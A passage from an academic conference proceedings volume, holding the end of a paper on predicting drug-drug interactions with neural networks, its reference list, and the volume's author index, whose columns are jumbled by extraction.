a thousand drug interaction and similarity data. This was done compromise for
the computational limitations faced by us. Expanding this dataset can give better
accuracy. Although we have tuned hyperparameters of the network using tenfold
cross-validation, better accuracy can be achieved from an even better-tuned network.
918 A. Kumar and M. Sharma

References

1. Lucy, D., Roberts, E. O., Corp, N., & Kadam, U. T. (2014). Multi-drug therapy in chronic
condition multimorbidity: A systematic review. Family Practice, 31(6), 654–663. https://doi.
org/10.1093/fampra/cmu056
2. Edwards, I. R., & Aronson, J. K. (2000). Adverse drug reactions: Definitions, diagnosis,
and management. Lancet, 356(9237), 1255–1259. https://doi.org/10.1016/S0140-6736(00)027
99-9 PMID: 11072960.
3. Palleria, C., Di Paolo, A., Giofrè, C., Caglioti, C., Leuzzi, G., Siniscalchi, A., & Gallelli, L.
(2013). Pharmacokinetic drug-drug interaction and their implication in clinical management.
Journal of Research in Medical Sciences: The Official Journal of Isfahan University of Medical
Sciences, 18(7), 601.
4. Boulenc X., Schmider W., Barberan O. (2011). In Vitro/in vivo correlation for drug-drug
interactions. In H. G. Vogel, J. Maas, A. Gebauer (Eds.), Drug discovery and evaluation:
Methods in clinical pharmacology. Springer. https://doi.org/10.1007/978-3-540-89891-7_14.
5. Vilar, S., Uriarte, E., Santana, L., Lorberbaum, T., Hripcsak, G., Friedman, C., & Tatonetti,
N. P. (2014). Similarity-based modelling in large-scale prediction of drug-drug interactions.
Nature Protocols, 9(9), 2147–2163. https://doi.org/10.1038/nprot.2014.151
6. Vilar, S., Uriarte, E., Santana, L., Tatonetti, N. P., & Friedman, C. (2013). Detection of drug-drug
interactions by modelling interaction profile fingerprints. PLoS ONE, 8(3), e58321.
7. Gottlieb, A., Stein, G. Y., Oron, Y., Ruppin, E., & Sharan, R. (2012). INDI: A computational
framework for inferring drug interactions and their associated recommendations. Molecular
System Biology, 8(1), 592.
8. Lee, G., Park, C., & Ahn, J. (2019). Novel deep learning model for more accurate prediction of
drug-drug interaction effects. BMC Bioinformatics, 20, 415. https://doi.org/10.1186/s12859-
019-3013-0
9. Cheng, F., Zhao, Z. (2014). Machine learning-based prediction of drug-drug interactions by
integrating drug phenotypic, therapeutic, chemical, and genomic properties. Journal of Amer-
ican Medical Information Association 21(e2), e278-86. https://doi.org/10.1136/amiajnl-2013-
002512. Epub 2014 Mar 18. PMID: 24644270; PMCID: PMC4173180.
10. Zhang, P., Wang, F., Hu, J., et al. (2015). Label propagation prediction of drug-drug interactions
based on clinical side effects. Science Report, 5, 12339. https://doi.org/10.1038/srep12339
11. Liu, S., Chen, Kai., Chen, Q., & Tang, B. (2016). Dependency-based convolutional neural
network for drug-drug interaction extraction. In 2016 IEEE International Conference on Bioin-
formatics and Biomedicine (BIBM) (pp. 1074-1080). https://doi.org/10.1109/BIBM.2016.782
2671.
12. Lim, S., Lee, K., & Kang, J. (2018). Drug-drug interaction extraction from the literature using
a recursive neural network. PLoS ONE, 13(1), e0190926. https://doi.org/10.1371/journal.pone.
0190926
13. Olayan. R.S., Ashoor, H., & Bajic, V.B. (2018). DDR: Efficient computational method to predict
drug-target interactions using graph mining and machine learning approaches. Bioinformatics
34(7), 1164–1173. https://doi.org/10.1093/bioinformatics/btx731. Erratum in: Bioinformatics.
2018 Nov 1; 34(21), 3779. PMID: 29186331; PMCID: PMC5998943.
14. Wang, B., Mezlini, A. M., Demir, F., Fiume, M., Tu, Z., Brudno, M., Haibe-Kains, B., &
Goldenberg, A. (2014). Similarity network fusion for aggregating data types on a genomic
scale. Natural Methods, 11(3), 333–337. https://doi.org/10.1038/nmeth.2810 Epub 2014 Jan
26 PMID: 24464287.
15. Zhang, W., et al. (2017). Predicting potential drug-drug interactions by integrating chemical,
biological, phenotypic and network data. BMC Bioinformatics, 18, 18.
16. Wan, F., Hong, L., Xiao, A., Jiang, T. & Zeng, J. (2018). Neodti: Neural integration of neigh-
bour information from a heterogeneous network for discovering new drug-target interactions.
bioRxiv 261396.
17. Rohani, N., & Eslahchi, C. (2019). Drug-drug interaction predicting by neural network using
integrated similarity. Science Report, 9, 13645. https://doi.org/10.1038/s41598-019-50121-3
Drug-Drug Interaction Prediction Based on Drug … 919

18. Wishart, D. S., Knox, C., Guo, A. C., Cheng, D., Shrivastava, S., Tzur, D., Gautam, B.,
& Hassanali, M. (2008). DrugBank: A knowledgebase for drugs, drug actions and drug
targets. Nucleic Acids Research, 36(Database issue), D901–D906, https://doi.org/10.1093/nar/
gkm958
19. Kanehisa, M., & Goto, S. (2000). KEGG: Kyoto encyclopedia of genes and genomes. Nucleic
Acids Research, 28(1), 27–30. https://doi.org/10.1093/nar/28.1.27
20. Tatonetti, N. P., Ye, P. P., Daneshjou, R., & Altman, R. B. (2012) Data-driven prediction of
drug effects and interactions. Science Translational Medicine 4(125):125ra31. https://doi.org/
10.1126/scitranslmed.3003377.
21. Kim, S., Thiessen, P. A., Cheng, T., Yu, B., Shoemaker, B. A., Wang, J., Bolton, E. E., Wang, Y.,
& Bryant, S. H. (2016). Literature information in PubChem: associations between PubChem
records and scientific articles. Journal of Cheminformatics, 8, 32. https://doi.org/10.1186/s13
321-016-0142-6
22. Kuhn, M., & Letunic, I. (2016). Lars Juhl Jensen, Peer Bork, The SIDER database of drugs
and side effects. Nucleic Acids Research, 44(D1), D1075–D1079. https://doi.org/10.1093/nar/
gkv1075
23. Hajian-Tilaki, K. (2013). Receiver operating characteristic (ROC) curve analysis for medical
diagnostic test evaluation. Caspian Journal of Internal Medicine, 4(2), 627–635.
Author Index

A Choudhary, Nilam, 569


Adhikari, Abhijit, 839 Chug, Anuradha, 509
Agarwal, Drishti, 237
Agarwal, Roopali, 559
Agathiyan, K., 261 D
Ahmed, Maaz, 223 Dahiya, Pankaj, 169, 749
Ahmed, Waseem, 223 Dahiya, Sonika, 757, 769, 793
Alias, Mohd Shukri, 59 Dasmohapatra, Sabyasachi, 617
Ali, Nikhat, 545 Desale, Ketan Sanjay, 157
Amrita, 817 Dhankhar, Sunil, 183
Anand, Vatsala, 449 Dhurandher, Sanjay K., 127
Antony, G. Kabin, 329 Dumka, Ankur, 93
Arora, Neha, 261 Dutta, Krittika, 721
Arya, Vivek, 569

F
B Fraz, Mohammad, 757
Bachate, Ravindra P., 665
Bahadur, Promila, 693, 857
Bhatia, Anshul, 509 G
Bhatia, Rajesh, 291 Garg, Amit Kumar, 645
Bhatt, Arvind Kumar, 1 Garg, Preeti, 315
Bhavani, Dokuparthi Sai Santhoshi, 839 Garg, Srishti, 857
Biradar, Rajashree V., 279 Gazi, Mohammad Danish, 301
Biswas, Sarmista, 423 Goel, Gaurav, 499
Gosain, Anjana, 85, 769
Gourisaria, Mahendra Kumar, 721, 735
C Goyal, S. B., 59
Chakraborty, Sudeshna, 817 Gupta, Arun, 581
Chandra, Girish, 471 Gupta, Ashish, 301
Chandra, Satish, 721 Gupta, Deepak, 899
Chaudhary, Juhi, 409 Gupta, Mayuri, 829
Chauhan, Bhargavi K., 15 Gupta, Megha, 31
Chauhan, Jaisal, 261 Gupta, Mukesh Kumar, 183
Choudhary, Ankur, 605 Gupta, Pallavi, 301
© The Editor(s) (if applicable) and The Author(s), under exclusive license 921
to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1
922 Author Index

Gupta, Sheifali, 449 N


Nadappattel, Hridya Shiju, 757
Nagrath, Preeti, 237
H Nandini, Durgesh, 879
Hamad, Abdulsattar Abdullah, 329 Nath, Mahendra Prasad, 383

J P
Jacob, Lija, 271 Pande, Sagar, 899
Jain, Shikha, 369 Pandey, Mahima Shanker, 461
Jain, Tanvi, 393 Pandey, Pratibha, 683
Jindal, Rajni, 435 Patel, Dhirenbhai B., 15
Patil, Shashikant, 535
Prabha, Rachna, 683
Prakash, Shiv, 521
K
Pramanik, Rwittika, 735
Kamparia, Aditya, 899
Priyadarshini, Sushree Bibhuprada B., 383,
Kandhoul, Nisha, 127
617
Kashyap, Parul, 341
Kaushik, Vandana Dixit, 247
Khamparia, Aditya, 889
R
Khanna, Ashish, 711
Raghav, S., 49
Khare, Sandali, 735
Rai, Saloni, 645
Khatri, Megha, 169
Rajoriya, Manisha, 301
Kirti, 355
Rajpal, Navin, 355, 369
Koundal, Deepika, 449
Ramachandra, H. V., 49
Krishna, C. Rama, 67
Rama Kishore, R., 31, 315
Kumar, Akshi, 869 Rani, Asha, 879
Kumar, Alok, 911 Rani, Poonam, 93
Kumar, Gaurav, 793 Rani, Sita, 569
Kumar, K. S. Raghu, 279 Rathkanthiwar, Shubhangi, 535
Kumar, Shivam, 817 Ravinder, M., 633
Kumar, Sumit, 499 Reddy, Kandula Balagangadhar, 271
Kurumbanshi, Suresh, 535 Reddy, S. Hareesh, 169
Rishabh, 779
Roy, Ritwik, 749
L
Lutimath, Nagaraj M., 49
S
Sachdeva, Nitin, 869
M Sachdeva, Ravi Kumar, 147
Madan, Kapil, 291 Saha, Anju, 85
Malhotra, Anshu, 435 Sharan, Mudita, 633
Malhotra, Radhika, 1 Sharma, Abhishek, 817
Mangla, Aakash, 237 Sharma, Ashok, 665
Maurya, Archana Sachindeo, 693, 857 Sharma, Megha, 581
Mehta, Purnima Lala, 481 Sharma, Moolchand, 911
Mishra, Anukram, 581 Sharma, Neha, 49
Mishra, Debahuti, 383 Sharma, Priya, 139
Mishra, Prateek, 147 Sharma, Sanjay Kumar, 139
Mittal, Dhruv, 749 Shetty, Mangala, 675
Mittal, Namita, 581 Shetty, Spoorthi, 675
Mohanty, Maitri, 711 Shinde, Swati V., 157
Mohapatra, Ambarish G., 711 Shivani, 67
Author Index 923

Shukla, Manoj Kumar, 559 Thivagar, M. Lellis, 329


Shukla, N. K., 521 Tiwari, Arvind Kumar, 103
Shukla, Ratnesh Kumar, 103 Tiwari, Pradeep K., 521
Shukla, Samiksha, 271, 423 Tiwari, Rajeev, 499
Shukla, Satyabrat, 481 Tiwari, Rajesh, 147
Shukla, Shantanu, 593 Tiwari, Shailesh, 605
Singhal, Avi, 749 Tiwari, Usha, 211
Singhal, Prateek, 103 Tripathi, Animesh, 521
Singhal, Yash Kumar, 829 Tripathi, G. S., 683
Singh, Amar, 665 Tripathi, Shailendra K., 211
Singh, Amit Prakash, 509 Tripathy, Pradyumna Kumar, 711
Singh, Amritpal, 889
Singh, Deepika, 85
Singh, Dinesh, 509 V
Singh, Gautam, 481 Verma, Abhishek Singh, 605
Singh, Ravinder Pal, 509 Verma, Deepa, 461
Singh, Vijander, 879 Verma, Sudhani, 471
Singh, Vineeta, 247 Verma, Sudhanshu, 683
Sinha, Adwitiya, 829
Soni, Priyansh, 757
Srivastava, Arpita, 1 Y
Srivastava, Harshit, 211 Yadav, Arnav, 793
Srivastava, Prabhat Kumar, 103 Yadav, Divakar, 199, 471, 593
Srivastava, Priyanka, 1 Yadav, Jyoti, 879
Sumathi, D., 839 Yadav, Jyotsna, 355, 369, 393, 409, 545
Sunar, Somesh, 211 Yadav, Pooja, 199
Suryavanshi, Raghuraj, 199, 593 Yadav, Rishika, 93
Swain, Debabrata, 271 Yadav, Sanjay Kumar, 147
Yadav, Vikas, 93

T
Tamilarasan, B., 329 Z
Taruna, 779 Zaza, Gianluca, 807

You might also like